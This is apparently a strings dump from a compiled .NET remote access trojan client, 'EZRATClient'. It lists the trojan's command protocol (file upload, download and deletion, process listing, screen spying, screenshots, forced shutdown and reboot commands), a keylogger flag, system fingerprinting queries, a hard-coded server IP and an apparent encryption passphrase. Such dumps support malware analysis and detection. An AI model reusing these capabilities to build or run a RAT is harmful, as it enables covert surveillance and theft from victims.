!This program cannot be run in DOS mode.
`.rsrc
@.reloc
&*BSJB
v4.0.30319
#Strings
<>9__2_0
<ParserAndExecute>b__2_0
<>c__DisplayClass2_0
<>c__DisplayClass14_0
<>c__DisplayClass16_0
<>9__6_0
<ScreenSpyThread>b__6_0
<AddMessage>b__0
<SendMessage>b__0
<>9__2_1
<ParserAndExecute>b__2_1
<SendMessage>b__1
IEnumerable`1
Action`1
IEnumerator`1
List`1
Microsoft.Win32
UInt32
ToInt32
3162D5D5638BBF501FD80751C66291086C7C28542CB28AF9CB08EF20770ADDB2
<ParserAndExecute>b__2
Func`2
__StaticArrayInitTypeSize=13
<ParserAndExecute>b__3
<>9__2_4
<ParserAndExecute>b__2_4
get_UTF8
<Module>
<PrivateImplementationDetails>
System.Drawing.Drawing2D
get_SW_HIDE
System.IO
set_IV
get_SW_SHOW
System.Media
rawData
mscorlib
System.Collections.Generic
get_Id
StopScreenSpyThread
isFileDownload
get_ScreenShotSpeed
set_ScreenShotSpeed
_screenShotSpeed
get_InvokeRequired
CancelClosed
get_Connected
get_Texted
set_Texted
_texted
ReadToEnd
SendCommand
HandleCommand
ExecuteCommand
command
btnSend
NetworkInterface
set_AutoScaleMode
FileMode
set_SmoothingMode
CryptoStreamMode
set_InterpolationMode
resizeImage
FromImage
DrawImage
get_Message
AddMessage
SendMessage
NewMessage
message
LocalIPCache
LocalAVCache
Invoke
Enumerable
IDisposable
ToDouble
RuntimeFieldHandle
Rectangle
SendFile
ReceiveFile
recvFile
Console
set_BorderStyle
set_FormBorderStyle
set_FlatStyle
get_Name
set_Name
GetFileName
get_MachineName
GetMachineName
get_VictimName
set_VictimName
_victimName
GetUserName
get_ServerName
set_ServerName
_serverName
get_ProcessName
GetHostName
GetCpuName
GetGpuName
GetHostByName
get_AddressPreferredLifetime
WriteLine
get_NewLine
LocalMachine
get_NetworkInterfaceType
ValueType
ProtocolType
SocketType
System.Core
EZRATClient.Core
connectedBefore
ButtonBase
TextBoxBase
ReceiveResponse
response
Dispose
Create
Delegate
Delete
CompilerGeneratedAttribute
GuidAttribute
UnverifiableCodeAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
SecurityPermissionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ParserAndExecute
set_UseShellExecute
ReadByte
GetValue
Receive
EZRATClient.exe
get_Size
set_Size
writeSize
ReduceByteSize
get_DefaultCompressionSize
set_DefaultCompressionSize
_defaultCompressionSize
set_ClientSize
fup_size
imgToResize
get_Png
System.Threading
Encoding
System.Drawing.Imaging
isKlThreadRunning
System.Runtime.Versioning
FromBase64String
ToBase64String
ToString
GetString
Substring
add_FormClosing
disposing
System.Drawing
ShowDialog
rtbMsg
tbxMsg
ForEach
GetFolderPath
get_Width
get_Length
StartsWith
add_Click
System.Security.Principal
set_Cancel
System.ComponentModel
kernel32.dll
user32.dll
ContainerControl
WindowsControl
ReadStream
FileStream
NetworkStream
CryptoStream
MemoryStream
Program
get_Item
System
SymmetricAlgorithm
ICryptoTransform
applicationHidden
CopyFromScreen
AppDomain
get_CurrentDomain
set_ShowIcon
MessageBoxIcon
get_Version
GetWindowsVersion
_version
set_Location
fdl_location
fup_location
System.Net.NetworkInformation
UnicastIPAddressInformation
GatewayIPAddressInformation
SecurityAction
System.Reflection
ControlCollection
UnicastIPAddressInformationCollection
GatewayIPAddressInformationCollection
ManagementObjectCollection
SearchOption
IOException
SocketException
SetResolution
Button
SocketShutdown
FileInfo
FileSystemInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
get_Ip
set_Ip
GetLanIp
onlyIp
Bitmap
get_Top
RequestLoop
System.Linq
set_ShowInTaskbar
get_Special_SeparatorChar
get_SeparatorChar
ScreenNumber
StreamReader
TextReader
StringBuilder
SpecialFolder
sender
encoder
Buffer
ManagementObjectSearcher
GetMainboardIdentifier
GetBiosIdentifier
MethodInvoker
FormClosingEventHandler
IContainer
ToUpper
CommandParser
ConnectToServer
IsLinuxServer
SoundPlayer
set_BackColor
set_UseVisualStyleBackColor
get_Special_Separator
_special_Separator
get_Separator
_separator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
CreateDecryptor
CreateEncryptor
CommandExecutor
Graphics
System.Diagnostics
GetCommands
GetBounds
GetAllNetworkInterfaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
EZRATClient.Forms.Chat.resources
DebuggingModes
EnumerateDirectories
GetIPProperties
IPInterfaceProperties
EnumerateFiles
GetProcesses
get_UnicastAddresses
get_GatewayAddresses
Constantes
get_Attributes
FileAttributes
Rfc2898DeriveBytes
GetBytes
GetLogicalDrives
GetDrives
SocketFlags
FormClosingEventArgs
CancelEventArgs
<>4__this
SystemInfoDetails
EZRATClient.Utils
ScreenUtils
get_Controls
System.Windows.Forms
EZRATClient.Forms
getScreens
set_AutoScaleDimensions
System.Security.Permissions
System.Collections
MessageBoxButtons
get_Chars
RuntimeHelpers
Process
GetLocalIPAddress
get_Address
GetMacAddress
GetPhysicalAddress
System.Net.Sockets
components
get_OperationalStatus
Concat
ImageFormat
PixelFormat
ManagementBaseObject
ManagementObject
TConnect
_isDiconnect
get_isDisconnect
set_isDisconnect
System.Net
CreateDataPacket
_clientSocket
get_Left
get_Height
add_ProcessExit
CurrentDomain_ProcessExit
get_Default
FirstOrDefault
DialogResult
EZRATClient
TcpClient
client
System.Management
Environment
InitializeComponent
get_Current
GetCurrent
GetTotalRamAmount
TakeScreenShot
Decrypt
Encrypt
ThreadStart
Convert
get_Port
set_Port
ToList
get_AddressList
set_TopMost
set_ReadTimeout
SuspendLayout
ResumeLayout
PerformLayout
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
get_Text
set_Text
clearText
cipherText
GetConsoleWindow
set_CreateNoWindow
ShowWindow
nCmdShow
set_TabIndex
MessageBox
set_MinimizeBox
set_MaximizeBox
ToolBox
RichTextBox
get_DarkGray
get_LightGray
InitializeArray
ToArray
ToCharArray
set_Key
OpenSubKey
get_EncryptKey
_encryptKey
RegistryKey
System.Security.Cryptography
get_AddressFamily
set_ReadOnly
get_Spy
set_Spy
BlockCopy
set_WorkingDirectory
IPHostEntry
Registry
set_CompositingQuality
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
EZRATClient
Copyright
2019
$2a079f4e-4dcc-44db-8ca1-0cf2c6a5f41d
0.1.6.1
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
RSDS0x
C:\Users\C\Desktop\EZRAT\EZRATClient\obj\Debug\EZRATClient.pdb
_CorExeMain
mscoree.dll
Ivan Medvedev
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Disconnected
Cipher Text:
Connection Ended
Connection ended
Socket is not connected!
Send Command Failure
Connection attempt
Connected
Hacker
Victim
rtbMsg
tbxMsg
btnSend
10.109.9.128
0.1.6.1
POULPE212123542345235
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
SELECT * FROM Win32_BIOS
Manufacturer
Bios :
Unknown
SELECT * FROM Win32_BaseBoard
SerialNumber
Mainboard :
SELECT * FROM Win32_Processor
CPU :
Select * From Win32_ComputerSystem
TotalPhysicalMemory
RAM :
RAM : 0
SELECT * FROM Win32_DisplayConfiguration
Description
GPU :
{0}{1}-
MAC :
\Song.wav
Total data write : {0}
upfilestop;
Total data : {0}
getinfo-
infoback;
lsdrives
lsdrives;
lsfiles-
lsfiles;
chatdata;
dlfile;
upfile;
dtfile;
rmfile;
procview;
scrnshot;
control;
shutdown /l
shutdown /r /t 00
shutdown /s /f /p /t 00
sysinfo;
msgbox;
screenspy;
stopscreenspy;
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
EZRATClient
FileVersion
0.1.6.1
InternalName
EZRATClient.exe
LegalCopyright
Copyright
2019
LegalTrademarks
OriginalFilename
EZRATClient.exe
ProductName
EZRATClient
ProductVersion
0.1.6.1
Assembly Version
0.1.6.1